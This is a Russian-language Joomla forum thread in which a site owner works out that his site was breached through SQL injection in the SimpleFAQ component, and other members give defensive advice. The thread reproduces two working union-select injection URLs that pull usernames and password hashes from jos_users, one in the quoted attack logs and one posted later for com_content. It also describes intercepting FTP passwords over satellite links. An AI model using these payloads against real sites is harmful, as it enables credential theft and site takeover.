уже 2 раз взломали сайт, помогите

Тема в разделе "Вопросы безопасности", создана пользователем MAXBeat, 16.04.2008.

  1. Offline

    MAXBeat Недавно здесь

    Регистрация:
    17.10.2006
    Сообщения:
    1
    Симпатии:
    0
    У меня уже второй раз за месяц взломали сайт, помогите пожалуйста разобраться где дыра и как ее закрыть.

    Были заменены шаблоны сайта и еще какие-то файлы (так и не понял какие), потому что вместо сайта вываливался скрипт для управления файлами на сервере. Так же был изменен пароль администратора в БД (это больше всего и пугает), но это только то, что я заметил, может быть что-то еще есть.
    После первого взлома я сделал, как рекомендует cms - выключил register global, safe mode и зпретил запись на configuration.php и все равно опять взломали

    Версия Joomla 1.0.11.1 RE-stable
    Установлено:

    SOBI 2 RC2.5.8a RE
    Alphacontent 2.5.8
    AdsManager 2.1.9 RE
    Symplyfaq 2.11 rus
    Akokomment v.2
    Fireboard 1.9
    Letterman 1.2.3 RE EX

    копия взломанного сайта: http://webfile.ru/1876936 (так же прилагается дамп базы с измененным паролем администратора)
    Логи: http://webfile.ru/1876861 (правда логи от первого взлома, но ломал один и тот же урод, ломал одинаково, так что думаю подойдут. От второго взлома логов пока нет)

    Помогите пожалуйста разобраться как защитить сайт. Заранее спасибо! Прошу прощения если создал тему не в той ветке форума.

    Добавлено через 16 минут
    Нашел еще: вместо russian.php в папке language лежит тот самый скрипт для управления файлами на сервере. Но как он смог заменить russian.php на свой файл?..

    Выкладываю этот файл: http://webfile.ru/1877025

    Добавлено через 4 часа 50 минут
    Все, разобрались, хакнули через компонент symplefaq обычной sql инъекцией:

    через гугл нашли, что на сайте установлен этот компонент:
    78.186.70.73 - - [03/Apr/2008:16:44:24 +0400] "GET /index.php?option=com_simplefaq&Itemid=12 HTTP/1.1" 200 20536 "http://www.google.com.tr/search?q=index.php%3Foption%3Dcom_simplefaq+inurl%3Ait&hl=tr" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

    и сама инъекция:
    78.186.70.73 - - [03/Apr/2008:16:44:40 +0400] "GET /index.php?option=com_simplefaq%20&task=answer&Itemid=9999&catid%20=9999&aid=-1/**/union/**/select/**/0,username,password,0,0,0,%200,0,%200,0,0,0,0,0,0,0,0,0,0,0/**/from/**/jos_users/* HTTP/1.1" 200 17308 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    узнали пароль

    Лечиться следующим образом: http://joomlaportal.ru/content/view/1386/70/
    А вот кратко о дыре: http://www.xakep.ru/post/39826/default.asp
     
    Последнее редактирование: 16.04.2008
  2.  
  3. Лат
    Offline

    Лат Звоните 8 (905) 778-52-44

    Регистрация:
    31.01.2007
    Сообщения:
    1 745
    Симпатии:
    113
    Пол:
    Мужской
    Ответ: уже 2 раз взломали сайт, помогите

    я вот не очень понимаю зачем первым сообщением делать крик аля *помогите, взломали, что делать?*, не воспользовавшись поиском и не почитав документацию.
     
  4. Offline

    CRAZY_MIHAN Недавно здесь

    Регистрация:
    15.03.2008
    Сообщения:
    4
    Симпатии:
    0
    Ответ: уже 2 раз взломали сайт, помогите

    Действительно, лучше сказать:
    Народ, у меня тут посещаемый портал, его ломанули 2й раз за месяц, да и хрен с ним, давайте лучше пива выпьем :D
    Автору респект за подробное описание инжы и лечения
     
  5. Offline

    Android Недавно здесь

    Регистрация:
    18.03.2007
    Сообщения:
    20
    Симпатии:
    0
    Пол:
    Мужской
    Ответ: уже 2 раз взломали сайт, помогите

    Есть компонент дэфендер который можно настроить на пресечение сиквел и пхп инжекций ;-)
     
  6. Offline

    sergv2005 Пользователь

    Регистрация:
    18.01.2006
    Сообщения:
    421
    Симпатии:
    20
    Пол:
    Мужской
    Ответ: уже 2 раз взломали сайт, помогите

    А че удивительного, компонент наверно тоже такой же древний, как и сайт. Уже давно версия джумлы 1.0.15, а сайт двух годичной давности, и компонент наверно того же времени, по крайней мере по гуглю видал SimpleFaq 2.40 версию. Ну и там же говорится про SQL-инекции для этой версии и ниже.
     
  7. profiX0808
    Offline

    profiX0808 Недавно здесь

    Регистрация:
    01.08.2008
    Сообщения:
    10
    Симпатии:
    0
    Пол:
    Мужской
    Ответ: уже 2 раз взломали сайт, помогите

    вывод: с регулярностью проверять сторонние компоненты на уязвимости посредством поисковика :)
     
  8. chilly_bang
    Offline

    chilly_bang Недавно здесь => Cпециалист <=

    Регистрация:
    30.04.2006
    Сообщения:
    1 541
    Симпатии:
    38
    Пол:
    Мужской
    Ответ: уже 2 раз взломали сайт, помогите

    Android, он по–моему за бабки и зазенденый к тому ж.
     
  9. Dead Krolik
    Offline

    Dead Krolik Недавно здесь => Cпециалист <=

    Регистрация:
    13.04.2007
    Сообщения:
    3 685
    Симпатии:
    101
    Пол:
    Мужской
    Ответ: уже 2 раз взломали сайт, помогите

    В 1.0.15 большого толку от узнавания хэша пароля нет. Я могу щас тысячу и один сайт найти и вытащить этот passwd. Но пароля я не узнаю. Он должен быть ОЧЕНЬ простым, что бы перебираться за часок.
     
  10. profiX0808
    Offline

    profiX0808 Недавно здесь

    Регистрация:
    01.08.2008
    Сообщения:
    10
    Симпатии:
    0
    Пол:
    Мужской
    Ответ: уже 2 раз взломали сайт, помогите

    а если задействовать кластер? :D
     
  11. Offline

    sergv2005 Пользователь

    Регистрация:
    18.01.2006
    Сообщения:
    421
    Симпатии:
    20
    Пол:
    Мужской
    Ответ: уже 2 раз взломали сайт, помогите

    Так, случайно нашёл, мож кому интересно будет - ссылка сдохла
    Вроде там даже где то видео лежит, как легко сломать джумлу, но где не знаю, я туда попал по одному топику на другом форуме, разговор шёл про видео, а попал чисто на форум.

    Думаю сей сайт, и ему подобные, будет полезны с той стороны, что там хацкеры находят уязвимости, которые можно исправить, тем кто это умеет.
     
    Последнее редактирование: 07.04.2011
  12. Offline

    nagi Недавно здесь

    Регистрация:
    03.10.2007
    Сообщения:
    48
    Симпатии:
    0
    Пол:
    Мужской
    Народ есть такая проблема, один пользователь каким то образом меняет настройки своего аккаунта,
    к примеру может скрываться на форуме на форуме эта отключена изначально, или менять редактор для себя в joomla 13 не могу найти где и как

    подмагите кто сталкивался
    стоит j13 stable
    форум FB 2.0

    нашел вот такую уезвимость com_conten в инете но не понял что она именно делает

    index.php?option=com_content&task=blogcategory&id=60&Itemid=99999%20union%20select%201,concat_ws(0x3a,username,password),3,4,5%20from%20jos_users/*
     
    Последнее редактирование: 27.10.2009
  13. Offline

    Amator155 Недавно здесь

    Регистрация:
    30.10.2009
    Сообщения:
    7
    Симпатии:
    0
    Пол:
    Мужской
    Здравствуйте! Сохраняете ли пароли от админки в автозаполнении браузера? Проверяли наличие вирусов? Рекомендую написать запрос тут для проверки сайта. Также возможен взлом не только через уязвимости, но и через троян где то на компьютере. Какой установлен антивирус? Лицензия? Скачайте Cure IT и проведите полную проверку компьютера. Если Cure IT найдет что либо рекомендуется прочитать эти правила и написать запрос.
     
  14. Asylum
    Offline

    Asylum Местный => Cпециалист <=

    Регистрация:
    09.02.2007
    Сообщения:
    2 744
    Симпатии:
    160
    Пол:
    Мужской
    Я даже пытался писать на эту тему, но так и не дописал. Все равно никто не читает, считая свой случай единственным и уникальным создает новый топик на форуме. Недавно случайно нашел способ кражи паролей от фтп. Как известно между вами и вашим сайтом бывает не один десяток провайдеров. Спутники как канал связи широко применяются. Пакеты легко перехватываются, кому интересно можно погуглить на тему "спутниковая рыбалка" Пакетов будет очень много и для этого существует специальный софт, например выбрать только фильмы. Ради интереса вбил фильтр фтп команд, часа через три упали первые пароли. Кто то может этим активно пользоваться
     
    Последнее редактирование модератором: 31.03.2014
    Кулибин нравится это.
  15. Лат
    Offline

    Лат Звоните 8 (905) 778-52-44

    Регистрация:
    31.01.2007
    Сообщения:
    1 745
    Симпатии:
    113
    Пол:
    Мужской
    Обновить FB до Kunena ( www.kunena.com), а движок до последней стабильной версии. У Вас Joomla 1.0.13? Так и пишите. А то Ваши сокращения непонятны.
     

Поделиться этой страницей

Загрузка...